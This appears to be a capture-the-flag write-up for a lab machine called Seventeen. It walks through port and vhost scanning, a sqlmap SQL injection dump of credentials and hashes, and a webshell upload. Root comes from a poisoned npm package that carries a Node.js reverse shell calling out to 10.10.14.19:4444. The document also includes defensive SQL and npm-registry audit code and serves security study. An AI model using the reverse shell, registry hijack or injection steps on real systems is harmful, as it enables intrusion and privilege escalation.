Basic information

Port scan

22,80,8000:

$ nmap -sC -sV -Pn 10.10.11.165
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-18 23:15 CST
Nmap scan report for 10.10.11.165
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2eb26ebb927d5e6b3693171a8209e464 (RSA)
| 256 1f57c653fc2d8b517d304202a4d65f44 (ECDSA)
|_ 256 d5a5363819fe0d677916e6da1791ebad (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Let's begin your education with us!
8000/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 403 Forbidden
Service Info: Host: 172.17.0.4; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.21 seconds

80

An education-related site; the corresponding domain name can be obtained from it:

$ curl -s 10.10.11.165 | grep seventeen | html2text | head -n1
seventeen.htb

8000

Accessing it directly returns a 403:

Subdomain scan

After adding the hosts entry, scanning for subdomains finds exam:

10.10.11.165 seventeen.htb

gobuster vhost -u http://seventeen.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Found: exam.seventeen.htb (Status: 200) [Size: 17375]

exam.seventeen.htb

An exam management system:

SQL injection

Searching in the exam system reveals a SQL injection:

sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" --batch -dbs

available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb

Information

Dump the databases: the sfms student table yields a username and password, and the erms users table yields more credentials as well as the oldmanagement path:

sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" --batch -D db_sfms --dump

Database: db_sfms
[3 tables]
+---------+
| user |
| storage |
| student |
+---------+

Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1 | 1A | Male | 12345 | Smith | 1a40620f9a4ed6cb8d81a1d365559233 | John |
| 2 | 2B | Male | 23347 | Mille | abb635c915b0cc296e071e8d76e9060c | James |
| 3 | 2C | Female | 31234 | Shane | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly |
| 4 | 3C | Female | 43347 | Hales | a1428092eb55781de5eb4fd5e2ceb835 | Jamie |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+

Database: erms_db
Table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1 | 1 | ../oldmanagement/files/avatar.png | Admin | fc8ec7b43523e186a27f46957818391c | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2022-02-24 22:00:15 |
| 6 | 2 | ../oldmanagement/files/avatar.png | Anthony | 48bb86d036bb993dfdcf7fefdc60cc06 | UndetectableMark | Mark | 2021-09-30 16:34:02 | NULL | 2022-05-10 08:21:39 |
| 7 | 2 | ../oldmanagement/files/avatar.png | Smith | 184fe92824bea12486ae9a56050228ee | Stev1992 | Steven | 2022-02-22 21:05:07 | NULL | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+

oldmanagement

This path lives on port 8000. Logging in with the credentials obtained reveals a file upload function:

webshell

A direct upload lands in a directory named after the student id, where it is not parsed; adjusting the upload so it goes to the parent directory is enough:

reverse shell

Information

Credentials are found in a PHP file:

www-data@5ec5dfc2216b:/var/www/html/employeemanagementsystem/process$ cat dbh.php
</html/employeemanagementsystem/process$ cat dbh.php
<?php

$servername = "localhost";
$dBUsername = "root";
$dbPassword = "2020bestyearofmylife";
$dBName = "ems";

$conn = mysqli_connect($servername, $dBUsername, $dbPassword, $dBName);

if(!$conn){
echo "Databese Connection Failed";
}

?>
www-data@5ec5dfc2216b:/var/www/html/employeemanagementsystem/process$ pwd
pwd
/var/www/html/employeemanagementsystem/process

Looking at the user accounts reveals mark:

www-data@5ec5dfc2216b:/var/www$ cat /etc/passwd | grep sh$
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
mark:x:1000:1000:,,,:/var/www/html:/bin/bash

user flag

mark's password is the database password; log in via ssh:

kavi

Checking again, we find kavi:

mark@seventeen:/var/www/html$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
kavi:x:1000:1000:kavi:/home/kavi:/bin/bash
mark:x:1001:1001:,,,:/home/mark:/bin/bash

In the opt directory there is a nodejs application with some modules installed, but we have no read permission on them.

Checking the listening ports reveals 4873; looking it up shows this is Verdaccio's port:

mark@seventeen:/tmp$ ss -tunlp

tcp LISTEN 0 128 127.0.0.1:4873 0.0.0.0:*

So these are most likely private npm modules; we can try installing them as the current user and inspect their contents.

db-logger

Install the module directly with npm and inspect it; a password is found inside:

npm --registry http://127.0.0.1:4873 info db-logger

npm --registry http://127.0.0.1:4873 install db-logger

mark@seventeen:/tmp$ cd node_modules/db-logger/
mark@seventeen:/tmp/node_modules/db-logger$ ls
logger.js package.json
mark@seventeen:/tmp/node_modules/db-logger$ cat logger.js
var mysql = require('mysql');

var con = mysql.createConnection({
host: "localhost",
user: "root",
password: "IhateMathematics123#",
database: "logger"
});

function log(msg) {
con.connect(function(err) {
if (err) throw err;
var date = Date();
var sql = `INSERT INTO logs (time, msg) VALUES (${date}, ${msg});`;
con.query(sql, function (err, result) {
if (err) throw err;
console.log("[+] Logged");
});
});
};

module.exports.log = log
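The `logger.js` above builds its INSERT with a template literal, so the logged message is spliced straight into the SQL text (and `Date()` returns an unquoted string, so the statement would not even parse). Below is an added example, not the box's module, of the parameterised form; the `con.query(sql, values, callback)` signature is the real `mysql` package's, while `fakeConnection` is a constructed stand-in so the module can be exercised without a database:

```javascript
// Added example (not the box's code): the db-logger module above interpolates the
// message into the SQL text. This hardened form binds values via placeholders and
// takes the connection as a parameter so it can be exercised with a stand-in.

// Vulnerable shape from the original module, kept only for comparison.
function buildUnsafeSql(date, msg) {
  return `INSERT INTO logs (time, msg) VALUES (${date}, ${msg});`;
}

// Hardened: fixed SQL text; the driver binds/escapes the values separately,
// so the message cannot change the statement's structure.
const SAFE_SQL = "INSERT INTO logs (time, msg) VALUES (?, ?)";

function createLogger(con) {
  return function log(msg, cb) {
    if (typeof msg !== "string") {
      return cb(new TypeError("log message must be a string"));
    }
    // Same con.query(sql, values, callback) form the `mysql` package provides.
    con.query(SAFE_SQL, [new Date(), msg], function (err, result) {
      if (err) return cb(err);
      cb(null, result);
    });
  };
}

// Stand-in connection (constructed for this demo) that records what the driver
// would receive; with the real package pass mysql.createConnection({...}) instead.
function fakeConnection() {
  const calls = [];
  return {
    calls,
    query(sql, values, cb) {
      calls.push({ sql, values });
      cb(null, { affectedRows: 1 });
    },
  };
}
```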

kavi again

The password obtained is kavi's password; log in via ssh:

Privilege escalation information

From the output above, inspecting the corresponding file shows that it installs two modules and then runs the app. loglevel is not installed to begin with and gets installed at run time, so if we modify the kavi user's npmrc file we can control where it is installed from, install a malicious module, and have it executed as root:

Privilege escalation &amp; root flag

Following the documentation, run a local npm package server and host the malicious module on it:

# start the server
npm install --global verdaccio
verdaccio --listen 0.0.0.0:4873

# build the package
# download the original package from the server and modify it
kavi@seventeen:/tmp/miao$ npm install loglevel
kavi@seventeen:/tmp/miao/node_modules$ zip -r ./loglevel.zip loglevel/*

nano lib/loglevel.js
# add the malicious code at the top

npm adduser --registry http://localhost:4873
npm login --registry http://localhost:4873
npm unpublish --force --registry http://localhost:4873
npm publish --registry http://localhost:4873

Then run it: the malicious module is installed, the code executes, and we get root:
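The escalation above works because a user-writable `.npmrc` redirects a root-run `npm install` to a registry the user controls. As an added example (not from the box or from Verdaccio), the audit below parses `.npmrc` text for registry overrides and checks that every `package-lock.json` entry resolves, with an integrity hash, to an allow-listed registry; the inputs are constructed strings, and on a real host you would feed it `~/.npmrc`, `/etc/npmrc`, the project's `.npmrc` and its lockfile:

```javascript
// Added example (not from the box): audit the npm registry configuration the
// escalation above abuses. Inputs are constructed; on a host read ~/.npmrc,
// /etc/npmrc, the project's .npmrc and its package-lock.json.

const DEFAULT_REGISTRY = "https://registry.npmjs.org/";

// Parse .npmrc (key=value lines; # or ; start a comment) into a plain object.
function parseNpmrc(text) {
  const out = {};
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || line.startsWith(";")) continue;
    const eq = line.indexOf("=");
    if (eq < 0) continue;
    out[line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return out;
}

// Flag "registry" and "@scope:registry" keys that point outside the allow-list.
// Plain-http or loopback targets get called out: a user-writable .npmrc with
// such a value is what lets a root-run `npm install` fetch an attacker's package.
function auditNpmrc(text, allowed = [DEFAULT_REGISTRY]) {
  const findings = [];
  for (const [key, value] of Object.entries(parseNpmrc(text))) {
    if (key !== "registry" && !key.endsWith(":registry")) continue;
    const norm = value.endsWith("/") ? value : value + "/";
    if (allowed.includes(norm)) continue;
    let why = "registry not in allow-list";
    if (norm.startsWith("http://")) why += ", unencrypted";
    if (/^https?:\/\/(localhost|127\.)/.test(norm)) why += ", loopback";
    findings.push({ key, value, why });
  }
  return findings;
}

// Check that each lockfile package was resolved from an allowed registry and
// carries an integrity hash, so a later install cannot silently come from elsewhere.
function auditLockfile(lock, allowed = [DEFAULT_REGISTRY]) {
  const bad = [];
  for (const [name, pkg] of Object.entries(lock.packages || {})) {
    if (!name) continue; // "" is the root project entry in lockfile v2/v3
    const resolved = pkg.resolved || "";
    if (!allowed.some((r) => resolved.startsWith(r)) || !pkg.integrity) {
      bad.push({ name, resolved, integrity: pkg.integrity || null });
    }
  }
  return bad;
}
```

Run it against every `.npmrc` npm would consult for the account that executes the install, not only the project directory, since per-user files apply to whatever that user runs.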

evil code

(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/bash", []);
var client = new net.Socket();
client.connect(4444, "10.10.14.19", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();

shadow

root:$6$zKJAdLXN$2q2KQQs7CNXr6p.GJAuzESBeX97RB2cdQID4hUUv12CIZvEhCATo8JqsvzVghUlHGVfHXgAuWIVE.GtdVVZPw.:19092:0:99999:7:::
kavi:$6$p67ISnef$mypsB6eaLk.iD7WzNHdnZBoKO1O1OgIE1E6pQ.7LidVs4O7TYNvnMkEMVFYXTrmxazGhMHf07HTwFyySxhY.V.:19092:0:99999:7:::
mark:$6$wQBYfx4H$H65tyKF3GL/61g4gr02xDnu5R4NerpbwhjO5ySUwx8Z701bfRLpXTli79hG67okVJQ6wlueO5NYWCVLONguxU1:19092:0:99999:7:::

References